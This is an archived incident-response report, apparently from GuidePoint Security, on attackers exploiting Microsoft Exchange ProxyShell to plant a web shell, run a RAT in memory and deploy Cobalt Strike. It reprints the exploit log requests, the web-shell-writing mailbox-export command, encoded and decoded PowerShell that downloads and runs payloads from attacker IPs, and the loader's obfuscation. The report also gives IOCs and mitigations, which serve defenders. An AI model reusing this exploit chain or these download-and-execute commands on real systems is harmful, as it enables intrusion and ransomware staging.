{ "id": "4c84cc35-6171-4b23-9f8e-69a0993627cd", "created_at": "2026-04-06T00:10:40.347439Z", "updated_at": "2026-04-10T13:12:51.61963Z", "deleted_at": null, "sha1_hash": "9240a1b5e64180f5a6891e5493e8c2047bdde139", "title": "A Ransomware Near Miss: ProxyShell, a RAT, and Cobalt Strike", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 344981, "plain_text": "A Ransomware Near Miss: ProxyShell, a RAT, and Cobalt Strike\r\nBy GuidePoint Security\r\nPublished: 2021-09-21 · Archived: 2026-04-05 16:18:56 UTC\r\nPublished 9/21/21, 9:00am\r\nIntroduction\r\nIn many instances, threat actors are paying just as much attention to public vulnerability disclosures as the blue\r\nteam. In some cases, they are paying even more attention to them, especially when proof-of-concept code is\r\nreleased for successful exploitation. This often results in fast turnaround of intrusion capabilities that can be\r\nleveraged to obtain access to an unsuspecting network. Such is the case with the Microsoft Exchange ProxyShell\r\nvulnerabilities.\r\nThe GuidePoint DFIR team was engaged to respond to alerts of Cobalt Strike being detected on an on-premises\r\nMicrosoft Exchange server and other Windows servers in an environment. Throughout the course of our\r\ninvestigation, we were able to eradicate all threat actor presence and Cobalt Strike Beacons and confirm that\r\nProxyShell vulnerabilities were used as the initial intrusion vector that resulted in the execution of a remote access\r\ntrojan on the compromised Exchange server. Additionally, we found evidence of tools and tactics being used that\r\nshare a high degree of similarity with the recent Conti affiliate playbooks leak.\r\nExploiting ProxyShell to Execute PowerShell\r\nLate in August, Microsoft announced the existence of CVE-2021-34473, CVE-2021-34523, and CVE-2021-\r\n31207, and with their powers combined, they are ProxyShell. These vulnerabilities, documented very thoroughly\r\nby FireEye, leverage pre-auth path confusion for ACL bypass, elevation of privilege on the Exchange PowerShell\r\nbackend, and post-auth arbitrary file writes to install a web shell onto the compromised system.\r\nIn this incident, we observed the following attack chain that successfully exploited ProxyShell vulnerabilities on\r\nthe compromised Exchange server. This exploitation led to a subsequent PowerShell execution that resulted in\r\nfurther malware being executed on the system.\r\nLocated below are the relevant log entries depicting ProxyShell exploitation:\r\nPre-Auth Path Confusion ACL Bypass (CVE-2021-34473)\r\n2021-08-21 06:45:00\r\nPOST /autodiscover/autodiscover.json @evil.corp/mapi/emsmdb?\r\n\u0026Email=autodiscover/autodiscover.json%3F@evil.corp\u0026CorrelationID=\u003cempty\u003e;\u0026cafeReqId=93a8d925-536f-4b92-821b-d8c7a4147022; 443 – 139[.]28[.]235[.]7 python-requests/2.26.0 - 200 0 0 75\r\nhttps://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/\r\nPage 1 of 9\n\nElevation of Privilege using Exchange PowerShell Backend (CVE-2021-34523)\r\n2021-08-21 06:45:01\r\nPOST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=\u003credacted\u003e\u0026Email=autodiscover/autodiscover.json%3F@evil.corp\r\n\u0026CorrelationID=\u003cempty\u003e;\u0026cafeReqId=fddfd6d8-6171-4259-acfa-1bedf67e796c; 443 – 139[.]28[.]235[.]7 python-requests/2.26.0 -\r\n200 0 0 98\r\nRCE via Post-Auth Arbitrary File Write\r\n2021-08-21 06:45:01\r\nNew-MailboxExportRequest -Mailbox \u003credacted\u003e -IncludeFolders \"#Drafts#\" -ContentFilter “Subject -eq\r\n'frhnc'” -ExcludeDumpster True -FilePath \"\\\\127.0.0.1\\c$\\inetpub\\wwwroot\\aspnet_client\\jotzv.aspx”\r\nWeb Shell Invocation\r\n2021-08-21 06:45:01\r\nPOST /aspnet_client/jotzv.aspx - 443 – 139[.]28[.]235[.]7 python-requests/2.26.0 - 200 0 0 691\r\nWeb Shell Command Executed\r\n2021-08-21 06:45:01\r\npowershell -nop -w hidden -ep bypass -enc\r\nSQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGM\r\nAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAG\r\ngAdAB0AHAAOgAvAC8ANAA1AC4AMwAyAC4AMgAyADkALgA2ADYALwByAHUAbgAuA\r\nHQAeAB0ACIAKQA=\r\nDecoded:\r\nIEX (New-Object Net.Webclient).downloadstring(“hxxp://45[.]32[.]229[.]66/run.txt”)\r\nDownload, Download, Download, RAT!\r\nThe PowerShell execution mechanism was interesting because it downloaded several payloads from multiple\r\nlocations before achieving its final goal of executing a RAT in memory on the compromised exchange server.\r\nhttps://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/\r\nPage 2 of 9\n\nFigure 1: Download and Execution Mechanism\r\nWhen the initial obfuscated PowerShell command is executed, it first retrieves additional commands from\r\nhxxp://45[.]32[.]229[.]66/run.txt . We retrieved the payload from the command and control server and\r\nobserved the following command contents:\r\n$path = $Env:temp+'\\komar.ps1';\r\n$client = New-Object System.Net.WebClient;\r\n$client.downloadfile('hxxp://45[.]32[.]229[.]66/komar.ps1',$path);\r\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden -executionpolicy bypass\r\n-file $path\r\nBy executing this series of PowerShell commands on the compromised Exchange server, the threat actor\r\ndownloaded another payload from the same command and control server, saved the PowerShell script payload to\r\n$ENV:temp\\komar.ps1 , and then executed the PowerShell script from a newly created 32-bit PowerShell process.\r\nThe contents of komar.ps1 are ultimately responsible for decoding an obfuscated payload, loading into memory,\r\nand executing it using a newly created thread. The obfuscation method, outlined below, is straightforward and\r\nuses a simple, but effective, method that leverages RegEx to read strings backwards and concatenate them\r\ntogether.\r\n$oaMNWBoiPsrJXPvIQjolY = (([regex]::Matches('\u003credacted for brevity\u003e ','.','RightToLeft') | ForEach\r\n{$_.value}) -join '')\r\n$lKasviAMAEPbJhgGKKIld = (([regex]::Matches('\u003credacted for brevity\u003e ','.','RightToLeft') | ForEach\r\n{$_.value}) -join '')\r\n[Byte[]]$JTpvAKubThgBlDnqojikG = [System.Convert]::FromBase64String((-\r\njoin($oaMNWBoiPsrJXPvIQjolY,$lKasviAMAEPbJhgGKKIld)))\r\nhttps://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/\r\nPage 3 of 9\n\nThe resultant value of $JTpvAKubThgBlDnqojikG (the final payload) is shellcode that is loaded into memory and\r\nexecuted. Using SpeakEasy, we were able to emulate the shellcode and obtain details on its functionality.\r\n0x1035: 'kernel32.VirtualAlloc(0x0, 0x20000, 0x3000, \"PAGE_EXECUTE_READWRITE\")' -\u003e 0x50000\r\n0x15c1: 'kernel32.LoadLibraryA(\"wininet.dll\")' -\u003e 0x7bc00000\r\n0x1613: 'kernel32.GetProcAddress(0x7bc00000, \"InternetOpenA\")' -\u003e 0xfeee0000\r\n0x1655: 'kernel32.GetProcAddress(0x7bc00000, \"InternetOpenUrlA\")' -\u003e 0xfeee0001\r\n0x1697: 'kernel32.GetProcAddress(0x7bc00000, \"InternetReadFile\")' -\u003e 0xfeee0002\r\n0x16d9: 'kernel32.GetProcAddress(0x7bc00000, \"InternetCloseHandle\")' -\u003e 0xfeee0003\r\n0x16e9: 'wininet.InternetOpenA(0x0, 0x0, 0x0, 0x0, 0x0)' -\u003e 0x20\r\n0x1702: 'wininet.InternetOpenUrlA(0x20, \"hxxp://108[.]62[.]12[.]122/Agent32.bin\", 0x0, 0x0,\r\n\"INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_RELOAD\", 0x0)' -\u003e 0x28\r\n0x1730: 'wininet.InternetReadFile(0x28, 0x50000, 0x20000, 0x1203f84)' -\u003e 0x1\r\n0x1737: 'wininet.InternetCloseHandle(0x28)' -\u003e 0x1 0x173e: 'wininet.InternetCloseHandle(0x20)' -\u003e 0x1\r\nThe emulated shellcode indicates that there is yet another downloaded payload that is obtained from a second\r\ncommand and control server. The payload is also loaded into memory and executed on the compromised system.\r\nWe retrieved Agent32.bin from the command and control server and conducted a thorough analysis of its\r\ncapabilities. Initially, an embedded PE is unpacked into memory and execution is transferred to the newly\r\nunpacked executable. The malware then collects the following information from the compromised system and\r\nsends it to the command and control server:\r\nSystem Name\r\nUser (including domain)\r\nVolumes information\r\nProcess ID and name\r\nNetwork interface IP addresses\r\nSystem version information\r\nThe compromised system information is then encrypted and sent to the command and control server via an HTTP\r\nPOST request.\r\nFigure 2: HTTP POST Request to Command and Control\r\nAs we dug deeper into the capabilities of this malware, we determined that its intended purpose as to provide\r\nremote access trojan (RAT) capabilities via commands received from the command and control server.\r\nhttps://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/\r\nPage 4 of 9\n\nSpecifically, this RAT has the following capabilities:\r\nProcess injection into cmd.exe or svchost.exe\r\nFile read, write, and delete\r\nNamed pipe reads and writes\r\nScript/Command execution via cmd.exe or PowerShell\r\nCreation of new processes to spawn malware executables\r\nDLL execution via Rundll32\r\nIn this case, this RAT was confirmed as being used to invoke Cobalt Strike on the compromised Exchange server.\r\nBeacons, Beacons Everywhere\r\nWhen Cobalt Strike is discovered in an environment, it is common to obtain different beacon configurations\r\nassociated with different team servers. It is also common to find Cobalt Strike beacons on multiple systems within\r\nthe compromised environment. In this incident, we discovered Cobalt Strike beacons on 15 critical infrastructure\r\nservers with four different beacon configurations defining four different team server IP addresses.\r\nThree of the beacons were using no malleable C2 profiles or very commonly observed malleable C2 profiles,\r\nhowever, one beacon was using a malleable C2 profile that is less common and masquerades as being associated\r\nwith Imperva. A snippet from the beacon configuration associated with that malleable C2 profile is located below:\r\nFigure 3: Snippet of Cobalt Strike Beacon\r\nIn early August 2021, a disgruntled Conti affiliate leaked Conti’s playbooks and toolsets on the underground\r\nforum XSS. In addition to Cobalt Strike being heavily utilized during this incident, which is heavily used by Conti\r\nand other ransomware groups, the following tools were identified within the environment:\r\nTool Name Description\r\nremovesophos.bat Sophos anti-virus removal utility\r\nuninstallSophos.bat Sophos anti-virus removal utility\r\nhttps://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/\r\nPage 5 of 9\n\nrclone.exe Data syncing utility commonly used for exfiltration\r\nTable 1: Observed Tools Sharing Similarities with Conti’s Tactics and Toolsets\r\nWe are unable to confirm whether this activity was related to Conti or one of its affiliates without the presence of\r\nencrypted files or ransom notes. That being said, the release of Conti’s playbooks was a double-edged sword. We\r\nreceived key insights into the group’s tactics and toolsets, however, now that those playbooks are public, other\r\nthreat actors are now free to use those playbooks for their own benefit.\r\nRecommendations\r\nThis attack originated from the exploitation of ProxyShell, a critical vulnerability in the Microsoft Exchange\r\nplatform, which resulted in the deployment of Cobalt Strike. Cobalt Strike continues to be sighted in a high\r\nvolume of incidents and will likely continue to be one of the post-exploitation tools of choice for threat actors due\r\nto its extreme flexibility and effective nature. With that in mind, here are some recommendations for mitigating\r\nthe risk associated with ProxyShell and proactively detecting Cobalt Strike and other threats within your\r\nenvironment:\r\nUpdate your Microsoft Exchange Server to the most recent version to mitigate the effects of CVE-2021-\r\n34473, CVE-2021-34523, and CVE-2021-31207.\r\nGuidance from Microsoft\r\nEnsure that EDR and other behavioral detection mechanisms are enabled and being actively reviewed in\r\nthe environment.\r\nImplement detections for suspicious and malicious behaviors including rundll32, regsvr32, or other\r\nnative Windows processes making connections to external IP addresses.\r\nReview all \u0026 baseline Powershell executions for anomalies.\r\nReview 7045 events for new Service Creations\r\nIncrease Windows event logging to ensure that critical events are captured and alerted on if possible.\r\nSysmon is a great choice for this type of logging.\r\nActively perform threat hunting in your environment and incorporate threat intelligence into your hunting\r\nactivities.\r\nConclusion\r\nThis incident started as so many others do, with Cobalt Strike alerts and the discovery of easily exploited\r\nvulnerabilities. This scenario demonstrates the importance of vulnerability management and patching, proactive\r\nand layered detection capabilities, and diligent response.\r\nAlthough ProxyShell was successfully exploited and Cobalt Strike was prevalent in the environment, the impacted\r\norganization was able to detect malicious activity early enough to begin incident response, eradicate the threat\r\nactor from their network, and prevent a likely ransomware attack.\r\nIndicators of Compromise (IOCs)\r\nhttps://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/\r\nPage 6 of 9\n\nIndicator Type Description\r\nC:\\Windows\\Temp\\n88.dll Filename Cobalt Strike Stager\r\nc:\\windows\\temp\\komar.ps1 Filename\r\nMalicious PowerShell\r\nScript – Downloader for\r\nAgent32.bin\r\nc:\\windows\\temp\\79-220.dll Filename Cobalt Strike Stager\r\nremovesophos.bat Filename\r\nSophos anti-virus\r\nremoval utility\r\nuninstallSophos.bat Filename\r\nSophos anti-virus\r\nremoval utility\r\nrclone.exe Filename\r\nData syncing utility\r\ncommonly used for\r\nexfiltration\r\n37[.]221[.]115[.]68 IPv4 Address Cobalt Strike Team Server\r\n45[.]32[.]229[.]66 IPv4 Address Server Hosting Payloads\r\n216[.]250[.]248[.]88 IPv4 Address Cobalt Strike Team Sever\r\n108[.]62[.]12[.]122 IPv4 Address Server Hosting Payloads\r\n185[.]153[.]199[.]164 IPv4 Address Cobalt Strike Team Server\r\n139[.]28[.]235[.]7 IPv4 Address\r\nIP Address Used for Initial\r\nProxyShell Exploitation\r\nf3b30bf4754c255107\r\n2d5e56ec263b80\r\nMD5 Cobalt Strike Stager\r\na9a78153f47ed223aa\r\n7b5ddd7023e005\r\nMD5 Cobalt Strike Stager\r\n4DD315284258A738E7472\r\n50CBA91CB3F\r\nMD5 Agent32.bin\r\n0b175c5c5968abe663436\r\naba278cff02\r\nMD5 Cobalt Strike Stager\r\nC524CA6A8A86C36A34FB4D\r\nC06A4A2696E80A1C07\r\nSHA1 Agent32.bin\r\nhttps://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/\r\nPage 7 of 9\n\n6e5388b4a55115d9819795a\r\n2d6571642c36b94cf\r\nSHA1 Cobalt Strike Stager\r\n6029de4976f7ef65d1975d\r\n802e091a217a49fcfe\r\nSHA1 Cobalt Strike Stager\r\n3ec37e679ebdf3a7122323\r\ndbc767128ed61f20d9\r\nSHA1 Cobalt Strike Stager\r\n196CD59446AD6BD6258EDAF\r\n94D4845E1A73455F87BCAEFF\r\n4241606366B6F7D87\r\nSHA256 Agent32.bin\r\n75b2f84255fed3e5c6dc0f2ea674\r\nc633059797784cdb172d7b3ad6c\r\n7d50b6954\r\nSHA256 Cobalt Strike Stager\r\ne7efa4414fb1904a26900c364f3\r\n49473e15a5f8c427560b73c259\r\n89d2a8efb34\r\nSHA256 Cobalt Strike Stager\r\nhxxp://193.29.104.218/push URL\r\nCobalt Strike Beacon\r\nGET URL\r\nhxxp://193.29.104.218/submit.php URL\r\nCobalt Strike Beacon\r\nPOST URL\r\nhxxp://216.250.248.88/cm URL\r\nCobalt Strike Beacon\r\nGET URL\r\nhxxp://216.250.248.88/j.ad URL\r\nCobalt Strike Beacon\r\nGET URL\r\nhxxp://216.250.248.88/submit.php URL\r\nCobalt Strike Beacon\r\nPOST URL\r\nhxxp://45.32.229.66/komar.ps1 URL\r\nMalicious PowerShell\r\nScript – Downloader for\r\nAgent32.bin\r\nhxxp://79[.]141[.]169[.]220/bSVQ URL\r\nCobalt Strike Stager\r\nTarget (Beacon Download)\r\nhxxp://79[.]141[.]169[.]220/dpixel URL\r\nCobalt Strike Beacon\r\nGET URL\r\nhxxp://79[.]141[.]169[.]220/OKaa URL\r\nCobalt Strike Stager Target\r\n(Beacon Download)\r\nhttps://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/\r\nPage 8 of 9\n\nhxxp://79[.]141[.]169[.]220/\r\nsubmit.php\r\nURL\r\nCobalt Strike Beacon\r\nPOST URL\r\nhxxps://37[.]221[.]115[.]68/\r\ncopyright.css\r\nURL\r\nCobalt Strike Beacon\r\nGET URL\r\nhxxps://37[.]221[.]115[.]68/ms URL\r\nCobalt Strike Beacon\r\nPOST URL\r\nMozilla/5.0 (Linux; Android 8.0.0;\r\nSM-G960F Build/R16NW)\r\nAppleWebKit/537.36 (KHTML,\r\nlike Gecko) Chrome/62.0.3202\r\nUser-Agent\r\nCobalt Strike Beacon\r\nUser-Agent\r\nSource: https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/\r\nhttps://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/" ], "report_names": [ "a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "50068c14-343c-4491-b568-df41dd59551c", "created_at": "2022-10-25T15:50:23.253218Z", "updated_at": "2026-04-10T02:00:05.234464Z", "deleted_at": null, "main_name": "Indrik Spider", "aliases": [ "Indrik Spider", "Evil Corp", "Manatee Tempest", "DEV-0243", "UNC2165" ], "source_name": "MITRE:Indrik Spider", "tools": [ "Mimikatz", "PsExec", "Dridex", "WastedLocker", "BitPaymer", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "b296f34c-c424-41da-98bf-90312a5df8ef", "created_at": "2024-06-19T02:03:08.027585Z", "updated_at": "2026-04-10T02:00:03.621193Z", "deleted_at": null, "main_name": "GOLD DRAKE", "aliases": [ "Evil Corp", "Indrik Spider ", "Manatee Tempest " ], "source_name": "Secureworks:GOLD DRAKE", "tools": [ "BitPaymer", "Cobalt Strike", "Covenant", "Donut", "Dridex", "Hades", "Koadic", "LockBit", "Macaw Locker", "Mimikatz", "Payload.Bin", "Phoenix CryptoLocker", "PowerShell Empire", "PowerSploit", "SocGholish", "WastedLocker" ], "source_id": "Secureworks", "reports": null }, { "id": "9806f226-935f-48eb-b138-6616c9bb9d69", "created_at": "2022-10-25T16:07:23.73153Z", "updated_at": "2026-04-10T02:00:04.729977Z", "deleted_at": null, "main_name": "Indrik Spider", "aliases": [ "Blue Lelantos", "DEV-0243", "Evil Corp", "G0119", "Gold Drake", "Gold Winter", "Manatee Tempest", "Mustard Tempest", "UNC2165" ], "source_name": "ETDA:Indrik Spider", "tools": [ "Advanced Port Scanner", "Agentemis", "Babuk", "Babuk Locker", "Babyk", "BitPaymer", "Bugat", "Bugat v5", "Cobalt Strike", "CobaltStrike", "Cridex", "Dridex", "EmPyre", "EmpireProject", "FAKEUPDATES", "FakeUpdate", "Feodo", "FriedEx", "Hades", "IEncrypt", "LINK_MSIEXEC", "MEGAsync", "Macaw Locker", "Metasploit", "Mimikatz", "PayloadBIN", "Phoenix Locker", "PowerShell Empire", "PowerSploit", "PsExec", "QNAP-Worm", "Raspberry Robin", "RaspberryRobin", "SocGholish", "Vasa Locker", "WastedLoader", "WastedLocker", "cobeacon", "wp_encrypt" ], "source_id": "ETDA", "reports": null }, { "id": "6c4f98b3-fe14-42d6-beaa-866395455e52", "created_at": "2023-01-06T13:46:39.169554Z", "updated_at": "2026-04-10T02:00:03.23458Z", "deleted_at": null, "main_name": "Evil Corp", "aliases": [ "GOLD DRAKE" ], "source_name": "MISPGALAXY:Evil Corp", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434240, "ts_updated_at": 1775826771, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9240a1b5e64180f5a6891e5493e8c2047bdde139.pdf", "text": "https://archive.orkl.eu/9240a1b5e64180f5a6891e5493e8c2047bdde139.txt", "img": "https://archive.orkl.eu/9240a1b5e64180f5a6891e5493e8c2047bdde139.jpg" } }